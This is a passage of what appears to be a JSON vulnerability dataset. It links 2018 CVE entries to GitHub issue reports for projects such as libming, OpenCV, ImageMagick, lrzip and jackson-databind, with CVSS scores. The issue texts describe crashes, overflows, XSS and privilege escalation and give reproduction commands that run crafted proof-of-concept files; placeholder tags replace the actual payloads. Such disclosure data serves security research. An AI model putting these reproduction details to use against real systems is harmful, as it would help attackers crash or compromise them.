  31269. "Issue_Url_old": "https://github.com/libming/libming/issues/97",
  31270. "Issue_Url_new": "https://github.com/libming/libming/issues/97",
  31271. "Repo_new": "libming/libming",
  31272. "Issue_Created_At": "2018-01-04T04:40:44Z",
  31273. "description": "left shift of a negative value in APITAG (util/read.c). on NUMBERTAG the latest version): there is a left shift of a negative value in the APITAG function (util/read.c), which can cause denial of service via a crafted swf file. PATHTAG runtime error: shift exponent NUMBERTAG is negative To reproduce the issue, compile libming with UBSAN \" fsanitize=undefined\", then execute: listswf $POC The POC file can be downloaded from: FILETAG",
  31274. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31275. "severity": "MEDIUM",
  31276. "baseScore": 6.5,
  31277. "impactScore": 3.6,
  31278. "exploitabilityScore": 2.8
  31279. },
  31280. {
  31281. "CVE_ID": "CVE-2018-5252",
  31282. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/34",
  31283. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/34",
  31284. "Repo_new": "jsummers/imageworsener",
  31285. "Issue_Created_At": "2018-01-04T05:58:02Z",
  31286. "description": "infinite loop in get_raw_sample_int . APITAG version NUMBERTAG Copyright NUMBERTAG Jason Summers Features NUMBERTAG bit Uses libjpeg version NUMBERTAG d Uses libpng version NUMBERTAG Uses zlib version NUMBERTAG imagew @ MENTIONTAG /tmp/out outfmt bmp CODETAG testcase: URLTAG",
  31287. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31288. "severity": "MEDIUM",
  31289. "baseScore": 5.3,
  31290. "impactScore": 3.6,
  31291. "exploitabilityScore": 1.6
  31292. },
  31293. {
  31294. "CVE_ID": "CVE-2018-5253",
  31295. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/233",
  31296. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/233",
  31297. "Repo_new": "axiomatic-systems/bento4",
  31298. "Issue_Created_At": "2018-01-04T12:48:08Z",
  31299. "description": "Infinite loop in APITAG MP4 To AAC File Converter Version NUMBERTAG APITAG Version NUMBERTAG c NUMBERTAG Axiomatic Systems, LLC ./mp NUMBERTAG aac @ MENTIONTAG ./out.aac ERRORTAG APITAG if size not zero Infinite loop CODETAG testcase: URLTAG",
  31300. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31301. "severity": "HIGH",
  31302. "baseScore": 7.8,
  31303. "impactScore": 5.9,
  31304. "exploitabilityScore": 1.8
  31305. },
  31306. {
  31307. "CVE_ID": "CVE-2018-5268",
  31308. "Issue_Url_old": "https://github.com/opencv/opencv/issues/10541",
  31309. "Issue_Url_new": "https://github.com/opencv/opencv/issues/10541",
  31310. "Repo_new": "opencv/opencv",
  31311. "Issue_Created_At": "2018-01-07T13:02:37Z",
  31312. "description": "A heap based buffer overflow happens in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => clang++ Compiled executable NUMBERTAG bits Detailed description A heap based buffer overflow happens in function APITAG in APITAG The crash details as follows: APITAG ERRORTAG APITAG Steps to reproduce Please refer to the following url for the testcases: URLTAG",
  31313. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31314. "severity": "MEDIUM",
  31315. "baseScore": 5.5,
  31316. "impactScore": 3.6,
  31317. "exploitabilityScore": 1.8
  31318. },
  31319. {
  31320. "CVE_ID": "CVE-2018-5269",
  31321. "Issue_Url_old": "https://github.com/opencv/opencv/issues/10540",
  31322. "Issue_Url_new": "https://github.com/opencv/opencv/issues/10540",
  31323. "Repo_new": "opencv/opencv",
  31324. "Issue_Created_At": "2018-01-07T12:58:35Z",
  31325. "description": "Assertion failure happens in bitstrm.cpp because of an incorrect integer cast. System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => clang++ Compiled executable NUMBERTAG bits Detailed description An assertion failure is triggered when parsing crafted image file in function APITAG in file APITAG This Assertion failure happens because an incorrect cast from a NUMBERTAG bit integer to NUMBERTAG bit integer. The crash details as follows: APITAG opencv_afl test: PATHTAG void APITAG Assertion APITAG && pos NUMBERTAG failed. Aborted (core dumped) APITAG Steps to reproduce Please refer to the following url for the testcases: URLTAG",
  31326. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31327. "severity": "MEDIUM",
  31328. "baseScore": 5.5,
  31329. "impactScore": 3.6,
  31330. "exploitabilityScore": 1.8
  31331. },
  31332. {
  31333. "CVE_ID": "CVE-2018-5294",
  31334. "Issue_Url_old": "https://github.com/libming/libming/issues/98",
  31335. "Issue_Url_new": "https://github.com/libming/libming/issues/98",
  31336. "Repo_new": "libming/libming",
  31337. "Issue_Created_At": "2018-01-05T20:26:52Z",
  31338. "description": "integer overflow caused by out of range left shift in APITAG (util/read.c). on NUMBERTAG the latest version): there is a out of range left shift in the APITAG function (util/read.c), which can cause denial of service via a crafted swf file. PATHTAG runtime error: left shift of NUMBERTAG by NUMBERTAG places cannot be represented in type 'int' To reproduce the issue, compile libming with UBSAN \" fsanitize=undefined\", then execute: listswf $POC The POC file can be downloaded from: FILETAG",
  31339. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31340. "severity": "MEDIUM",
  31341. "baseScore": 6.5,
  31342. "impactScore": 3.6,
  31343. "exploitabilityScore": 2.8
  31344. },
  31345. {
  31346. "CVE_ID": "CVE-2018-5357",
  31347. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/941",
  31348. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/941",
  31349. "Repo_new": "imagemagick/imagemagick",
  31350. "Issue_Created_At": "2018-01-11T02:55:39Z",
  31351. "description": "memory leaks. ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): fontconfig freetype png x zlib ubuntu APITAG magick convert poc /dev/null convert: unable to open image PATHTAG No such file or directory @ PATHTAG convert: no images defined PATHTAG @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG be NUMBERTAG ea NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG be2ccd NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG be2cf NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG bda NUMBERTAG c in APITAG PATHTAG NUMBERTAG f NUMBERTAG bdbaeefd in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG bb9eef NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). FILETAG",
  31352. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31353. "severity": "MEDIUM",
  31354. "baseScore": 6.5,
  31355. "impactScore": 3.6,
  31356. "exploitabilityScore": 2.8
  31357. },
  31358. {
  31359. "CVE_ID": "CVE-2018-5358",
  31360. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/939",
  31361. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/939",
  31362. "Repo_new": "imagemagick/imagemagick",
  31363. "Issue_Created_At": "2018-01-11T02:01:40Z",
  31364. "description": "memory leaks. ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): fontconfig freetype png x zlib ubuntu APITAG magick montage json.psd FILETAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f6d NUMBERTAG fb6fd in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG ff NUMBERTAG c in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG e5d NUMBERTAG in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG e NUMBERTAG c6f in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG acd NUMBERTAG in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG da NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG da NUMBERTAG d in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG b NUMBERTAG d1 in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG b NUMBERTAG b in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG dc5c in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG eefd in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f6d NUMBERTAG fcef NUMBERTAG in __libc_start_main PATHTAG FILETAG",
  31365. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31366. "severity": "MEDIUM",
  31367. "baseScore": 6.5,
  31368. "impactScore": 3.6,
  31369. "exploitabilityScore": 2.8
  31370. },
  31371. {
  31372. "CVE_ID": "CVE-2018-5650",
  31373. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/88",
  31374. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/88",
  31375. "Repo_new": "ckolivas/lrzip",
  31376. "Issue_Created_At": "2018-01-12T15:44:59Z",
  31377. "description": "Infinite Loop Vulnerability in unzip_match function (src/runzip.c). on NUMBERTAG the latest version): there is an infinite loop and application hang in the unzip_match function (src/runzip.c), which can be triggered by the POC with command lrzip t $POC Looking into the unzip_match function (src/runzip.c), we found that in the while loop (line NUMBERTAG the \"offset\" could be manipulated by a crafted lrz file (line NUMBERTAG When offset is set to zero, n will always be zero (line NUMBERTAG which in turn causes len always be non zero, the infinite loop occurs. The code segment is NUMBERTAG static i NUMBERTAG read_fdhist(rzip_control control, void buf, i NUMBERTAG len NUMBERTAG offset = read_vchars(control, ss NUMBERTAG chunk_bytes NUMBERTAG while (len NUMBERTAG n = MIN(len, offset NUMBERTAG len = n NUMBERTAG off_buf += n NUMBERTAG total += n NUMBERTAG POC: FILETAG The gdb backtrack is as follows: (gdb) bt NUMBERTAG in md5_process_bytes NUMBERTAG e NUMBERTAG in unzip_match NUMBERTAG ae4 in runzip_chunk NUMBERTAG a3 in runzip_fd NUMBERTAG in decompress_file NUMBERTAG d0f4 in main ()",
  31378. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31379. "severity": "MEDIUM",
  31380. "baseScore": 5.5,
  31381. "impactScore": 3.6,
  31382. "exploitabilityScore": 1.8
  31383. },
  31384. {
  31385. "CVE_ID": "CVE-2018-5698",
  31386. "Issue_Url_old": "https://github.com/WizardMac/ReadStat/issues/108",
  31387. "Issue_Url_new": "https://github.com/wizardmac/readstat/issues/108",
  31388. "Repo_new": "wizardmac/readstat",
  31389. "Issue_Created_At": "2018-01-11T02:48:57Z",
  31390. "description": "Heap overflow in APITAG APITAG version NUMBERTAG prerelease Ubuntu NUMBERTAG git log CODETAG ./readstat ./heap buffer overflow.dta NUMBERTAG sav ERRORTAG",
  31391. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31392. "severity": "HIGH",
  31393. "baseScore": 7.8,
  31394. "impactScore": 5.9,
  31395. "exploitabilityScore": 1.8
  31396. },
  31397. {
  31398. "CVE_ID": "CVE-2018-5706",
  31399. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4167",
  31400. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4167",
  31401. "Repo_new": "octopusdeploy/issues",
  31402. "Issue_Created_At": "2018-01-16T01:34:00Z",
  31403. "description": "Block team editing when the user tries to escalate privileges. A user with APITAG permissions, but not Administer System permissions can edit a team to add the System Administrator role to their team add themselves to the System Administrator team Also a user with APITAG permissions, but not Administer System permissions can edit their own user roles to include Administer System.",
  31404. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  31405. "severity": "HIGH",
  31406. "baseScore": 8.8,
  31407. "impactScore": 5.9,
  31408. "exploitabilityScore": 2.8
  31409. },
  31410. {
  31411. "CVE_ID": "CVE-2018-5727",
  31412. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1053",
  31413. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1053",
  31414. "Repo_new": "uclouvain/openjpeg",
  31415. "Issue_Created_At": "2018-01-13T05:29:20Z",
  31416. "description": "Integer overflow in opj_t1_encode_cblks ( PATHTAG ). APITAG problem is discovered when UBSAN is enabled) on openjpeg NUMBERTAG latest version): there is a integer overflow in the opj_t1_encode_cblks function ( PATHTAG ), which could be triggered by the POC. POC address: FILETAG Command: opj_compress n NUMBERTAG i $POC o /tmp/null.j2k PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int'",
  31417. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31418. "severity": "MEDIUM",
  31419. "baseScore": 6.5,
  31420. "impactScore": 3.6,
  31421. "exploitabilityScore": 2.8
  31422. },
  31423. {
  31424. "CVE_ID": "CVE-2018-5747",
  31425. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/90",
  31426. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/90",
  31427. "Repo_new": "ckolivas/lrzip",
  31428. "Issue_Created_At": "2018-01-17T16:11:56Z",
  31429. "description": "use after free in ucompthread (src/stream.c). on NUMBERTAG the latest version) and the latest master branch: there is a use after free problem in the ucompthread function (src/stream.c) that causes the program to crash, which can be triggered by the POC with command lrzip t $POC POC: FILETAG The problem happens in line NUMBERTAG of stream.c file. Once \"ucthread\" is released, \"uci\" is related with a random address, which causes segmentation fault NUMBERTAG uci = &ucthread[i NUMBERTAG retry NUMBERTAG if (uci >c_type != CTYPE_NONE NUMBERTAG switch (uci >c_type NUMBERTAG case CTYPE_LZMA: PATHTAG t PATHTAG Decompressing... ASAN:SIGSEGV APITAG while reporting a bug found another one. Ignoring. ASAN:SIGSEGV APITAG while reporting a bug found another one. Ignoring. chunk_bytes NUMBERTAG is invalid in runzip_chunk Fatal error exiting APITAG ASAN:SIGSEG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG d NUMBERTAG ebc0 at pc NUMBERTAG e NUMBERTAG bp NUMBERTAG fdc NUMBERTAG f9d NUMBERTAG sp NUMBERTAG fdc NUMBERTAG f9d NUMBERTAG ASAN:SIGSEGV APITAG while reporting a bug found another one. Ignoring. APITAG while reporting a bug found another one. Ignoring. READ of size NUMBERTAG at NUMBERTAG d NUMBERTAG ebc0 thread T NUMBERTAG e NUMBERTAG in ucompthread PATHTAG NUMBERTAG fdc8a NUMBERTAG ce NUMBERTAG in start_thread APITAG NUMBERTAG fdc NUMBERTAG a NUMBERTAG c in __clone APITAG NUMBERTAG d NUMBERTAG ebc0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG fdc8ae NUMBERTAG e NUMBERTAG in __interceptor_free PATHTAG NUMBERTAG in close_stream_in PATHTAG previously allocated by thread T0 here NUMBERTAG fdc8ae NUMBERTAG in __interceptor_calloc PATHTAG NUMBERTAG d in open_stream_in PATHTAG Thread T7 created by T0 here NUMBERTAG fdc8ae NUMBERTAG b4 in __interceptor_pthread_create PATHTAG NUMBERTAG e5cc in create_pthread PATHTAG SUMMARY: APITAG heap use after free PATHTAG ucompthread Shadow bytes around the buggy address NUMBERTAG c3a7fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3a7fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3a7fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3a7fffbd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbd NUMBERTAG fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd NUMBERTAG c3a7fffbd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbda0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbdb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbdc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING APITAG",
  31430. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31431. "severity": "MEDIUM",
  31432. "baseScore": 5.5,
  31433. "impactScore": 3.6,
  31434. "exploitabilityScore": 1.8
  31435. },
  31436. {
  31437. "CVE_ID": "CVE-2018-5772",
  31438. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/216",
  31439. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/216",
  31440. "Repo_new": "exiv2/exiv2",
  31441. "Issue_Created_At": "2018-01-18T05:42:05Z",
  31442. "description": "Segmentation fault caused by uncontrolled recursion of APITAG APITAG On latest version of exi NUMBERTAG and the latest master branch: there is a segmentation fault caused by uncontrolled recursion of APITAG function in src/image.cpp file, which could cause a denial of service via a crafted tif file. This issue could be reproduced by command: exi NUMBERTAG POC. POC is available at: FILETAG The stack trace is as follows: APITAG of APITAG call... at PATHTAG NUMBERTAG ffff7b9d6c2 in APITAG (this NUMBERTAG b0, io=..., out=..., APITAG start NUMBERTAG APITAG c NUMBERTAG M', depth NUMBERTAG at PATHTAG NUMBERTAG ffff7b9d6c2 in APITAG (this NUMBERTAG b0, io=..., out=..., APITAG start NUMBERTAG APITAG c NUMBERTAG M', depth NUMBERTAG at PATHTAG NUMBERTAG ffff7b9d6c2 in APITAG (this NUMBERTAG b0, io=..., out=..., APITAG start NUMBERTAG APITAG c NUMBERTAG M', depth NUMBERTAG at PATHTAG NUMBERTAG ffff7b9df NUMBERTAG in APITAG (this NUMBERTAG b0, io=..., out=..., APITAG depth NUMBERTAG offset NUMBERTAG at PATHTAG NUMBERTAG ffff7be NUMBERTAG b in APITAG (this NUMBERTAG b0, out=..., APITAG depth NUMBERTAG at PATHTAG NUMBERTAG ffff7be NUMBERTAG in APITAG (this NUMBERTAG b0) at PATHTAG NUMBERTAG adde in APITAG (this NUMBERTAG at PATHTAG NUMBERTAG a9b3 in APITAG (this NUMBERTAG path=...) at PATHTAG NUMBERTAG bfb9 in main (argc NUMBERTAG arg NUMBERTAG fffffffdd NUMBERTAG at PATHTAG",
  31443. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31444. "severity": "MEDIUM",
  31445. "baseScore": 5.5,
  31446. "impactScore": 3.6,
  31447. "exploitabilityScore": 1.8
  31448. },
  31449. {
  31450. "CVE_ID": "CVE-2018-5773",
  31451. "Issue_Url_old": "https://github.com/trentm/python-markdown2/issues/285",
  31452. "Issue_Url_new": "https://github.com/trentm/python-markdown2/issues/285",
  31453. "Repo_new": "trentm/python-markdown2",
  31454. "Issue_Created_At": "2018-01-18T06:06:04Z",
  31455. "description": "Possible XSS in safe_mode using incomplete tags. APITAG with latest version: ERRORTAG using APITAG : ERRORTAG I think it will be a better approach to encode the incomplete tags as well to prevent it. URLTAG",
  31456. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  31457. "severity": "MEDIUM",
  31458. "baseScore": 6.1,
  31459. "impactScore": 2.7,
  31460. "exploitabilityScore": 2.8
  31461. },
  31462. {
  31463. "CVE_ID": "CVE-2018-5773",
  31464. "Issue_Url_old": "https://github.com/google/osv/issues/430",
  31465. "Issue_Url_new": "https://github.com/google/osv.dev/issues/430",
  31466. "Repo_new": "google/osv.dev",
  31467. "Issue_Created_At": "2022-05-18T14:37:27Z",
  31468. "description": "APITAG Data quality issue for APITAG . MENTIONTAG reported this upstream to APITAG : APITAG Produces: CODETAG But APITAG isn't valid for APITAG (it's only valid for APITAG ): URLTAG It looks like OSV has both APITAG and its CVE alias, but with a missing \"version fixed\" for the GHSA version: URLTAG cc MENTIONTAG as well for visibility.",
  31469. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  31470. "severity": "MEDIUM",
  31471. "baseScore": 6.1,
  31472. "impactScore": 2.7,
  31473. "exploitabilityScore": 2.8
  31474. },
  31475. {
  31476. "CVE_ID": "CVE-2018-5785",
  31477. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1057",
  31478. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1057",
  31479. "Repo_new": "uclouvain/openjpeg",
  31480. "Issue_Created_At": "2018-01-19T02:36:38Z",
  31481. "description": "Out of bound left shift in opj_j2k_setup_encoder ( PATHTAG ). APITAG problem is discovered with UBSAN enabled) On latest version NUMBERTAG and master branch of openjpeg: there is an integer overflow caused by out of bound left shift in opj_j2k_setup_encoder function ( PATHTAG ), which could cause denial of service via a crafted bmp file. PATHTAG runtime error: shift exponent NUMBERTAG is too large for NUMBERTAG bit type 'int' To reproduce this issue, run: bin/opj_compress n NUMBERTAG i $POC o OUTPUT The POC could be downloaded at: FILETAG",
  31482. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31483. "severity": "MEDIUM",
  31484. "baseScore": 6.5,
  31485. "impactScore": 3.6,
  31486. "exploitabilityScore": 2.8
  31487. },
  31488. {
  31489. "CVE_ID": "CVE-2018-5786",
  31490. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/91",
  31491. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/91",
  31492. "Repo_new": "ckolivas/lrzip",
  31493. "Issue_Created_At": "2018-01-19T05:20:03Z",
  31494. "description": "Infinite Loop Vulnerability in get_fileinfo (src/lrzip.c). On latest version NUMBERTAG and the master branch, there is an infinite loop and application hang in the get_fileinfo function (src/lrzip.c), which can be triggered by the POC with command: lrzip i $POC Looking into the get_fileinfo function (src/lrzip.c), we found that: in the \"do {} while(last_head)\" loop, the \"last_head\" variable is affected by the POC file and always non zero, and \"lseek\" in line NUMBERTAG continuously moves file cursor to the same position. That means, \"last_head\" is always assigned the value from the same file position, resulting in infinite loop NUMBERTAG bool get_fileinfo(rzip_control control NUMBERTAG do NUMBERTAG if (unlikely(head_off = lseek(fd_in, last_head + ofs, SEEK_SET NUMBERTAG APITAG to seek to header data in get_fileinfo \"), error NUMBERTAG if APITAG fd_in, &ctype, &c_len, &u_len NUMBERTAG last_head, chunk_byte NUMBERTAG return false NUMBERTAG while (last_head); POC: FILETAG",
  31495. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31496. "severity": "MEDIUM",
  31497. "baseScore": 5.5,
  31498. "impactScore": 3.6,
  31499. "exploitabilityScore": 1.8
  31500. },
  31501. {
  31502. "CVE_ID": "CVE-2018-5968",
  31503. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1899",
  31504. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1899",
  31505. "Repo_new": "fasterxml/jackson-databind",
  31506. "Issue_Created_At": "2018-01-18T11:24:26Z",
  31507. "description": "Another two gadgets to exploit default typing issue in jackson. Hi, there. Recently, I found that there are two new gadgets can be used to exploit jackson which can cause RCE vulnerability. I had sent the report to APITAG . Cheers!",
  31508. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  31509. "severity": "HIGH",
  31510. "baseScore": 8.1,
  31511. "impactScore": 5.9,
  31512. "exploitabilityScore": 2.2
  31513. },
  31514. {
  31515. "CVE_ID": "CVE-2018-6010",
  31516. "Issue_Url_old": "https://github.com/yiisoft/yii2/issues/14711",
  31517. "Issue_Url_new": "https://github.com/yiisoft/yii2/issues/14711",
  31518. "Repo_new": "yiisoft/yii2",
  31519. "Issue_Created_At": "2017-08-23T16:09:01Z",
  31520. "description": "Exceptions on AJAX requests display sensitive information. What steps will reproduce the problem? Throw an exception anywhere in your code, make sure that APITAG is off and that you do not have a custom error action ( ERRORTAG ) configured: ERRORTAG Now make an AJAX request to the page that throws the exception and make sure that the response format is set to APITAG . What is the expected result? Response text: ERRORTAG What do you get instead? Response text: ERRORTAG Additional info | Q | A | | | Yii version NUMBERTAG PHP version NUMBERTAG Operating system | Linux I haven't had a chance to test this with the newest Yii2 version but checked the code inside ERRORTAG quickly and it looks like it will lead to the same problem.",
  31521. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  31522. "severity": "HIGH",
  31523. "baseScore": 7.5,
  31524. "impactScore": 3.6,
  31525. "exploitabilityScore": 3.9
  31526. },
  31527. {
  31528. "CVE_ID": "CVE-2018-6193",
  31529. "Issue_Url_old": "https://github.com/sshipway/routers2/issues/1",
  31530. "Issue_Url_new": "https://github.com/sshipway/routers2/issues/1",
  31531. "Repo_new": "sshipway/routers2",
  31532. "Issue_Created_At": "2018-01-18T21:49:55Z",
  31533. "description": "XSS rtr param. During a security test I found that routers2.cgi has a Cross Site Scripting (XSS) vulnerability, affecting the rtr GET parameter in the request below. This may enable attackers to inject malicious scripts into client browser. APITAG XSS Evidence NUMBERTAG FILETAG \"XSS Evidence NUMBERTAG SS Evidence NUMBERTAG FILETAG \"XSS Evidence NUMBERTAG Cause: [ APITAG URLTAG All the params returned in the HTML should be escaped.",
  31534. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
  31535. "severity": "MEDIUM",
  31536. "baseScore": 4.7,
  31537. "impactScore": 2.7,
  31538. "exploitabilityScore": 1.6
  31539. },
  31540. {
  31541. "CVE_ID": "CVE-2018-6196",
  31542. "Issue_Url_old": "https://github.com/tats/w3m/issues/88",
  31543. "Issue_Url_new": "https://github.com/tats/w3m/issues/88",
  31544. "Repo_new": "tats/w3m",
  31545. "Issue_Created_At": "2017-01-22T05:16:33Z",
  31546. "description": "infinite recursion in APITAG input ( APITAG ) CODETAG how to reproduce: APITAG",
  31547. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  31548. "severity": "HIGH",
  31549. "baseScore": 7.5,
  31550. "impactScore": 3.6,
  31551. "exploitabilityScore": 3.9
  31552. },
  31553. {
  31554. "CVE_ID": "CVE-2018-6197",
  31555. "Issue_Url_old": "https://github.com/tats/w3m/issues/89",
  31556. "Issue_Url_new": "https://github.com/tats/w3m/issues/89",
  31557. "Repo_new": "tats/w3m",
  31558. "Issue_Created_At": "2017-02-14T04:58:05Z",
  31559. "description": "segv in APITAG input ( APITAG ) CODETAG how to reproduce: ERRORTAG stderr: ERRORTAG More detail to reproduce please see URLTAG For your convenience, gdbline: APITAG gdb args ./w3m APITAG T text/html dump cases/tats w3m NUMBERTAG found by afl fuzz",
  31560. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  31561. "severity": "HIGH",
  31562. "baseScore": 7.5,
  31563. "impactScore": 3.6,
  31564. "exploitabilityScore": 3.9
  31565. },
  31566. {
  31567. "CVE_ID": "CVE-2018-6307",
  31568. "Issue_Url_old": "https://github.com/LibVNC/libvncserver/issues/241",
  31569. "Issue_Url_new": "https://github.com/libvnc/libvncserver/issues/241",
  31570. "Repo_new": "libvnc/libvncserver",
  31571. "Issue_Created_At": "2018-08-14T15:11:45Z",
  31572. "description": "SECURITY: Heap use after free in tightvnc filetransfer extension. Since security issues have been already reported to this repository and I didn't manage to find any other information about reporting vulnerabilities, I feel that it is okay to report this issue here. In PATHTAG function APITAG contains the following code : ERRORTAG This vulnerability requires tight file transfer extesion to be enabled. APITAG function calls APITAG extension destructor routine which APITAG extension data, in this case APITAG rtcp variable. rtcp is later used as argument to ERRORTAG function, which results use after free. Asan report: ERRORTAG This security issue is a result of my work at Kaspersky Lab ICS CERT Vulnerability Research Group at position of Security Researcher. For more information about ICS CERT please contact: ics EMAILTAG FILETAG Best regards, Pavel Cheremushkin",
  31573. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  31574. "severity": "HIGH",
  31575. "baseScore": 8.1,
  31576. "impactScore": 5.9,
  31577. "exploitabilityScore": 2.2
  31578. },
  31579. {
  31580. "CVE_ID": "CVE-2018-6315",
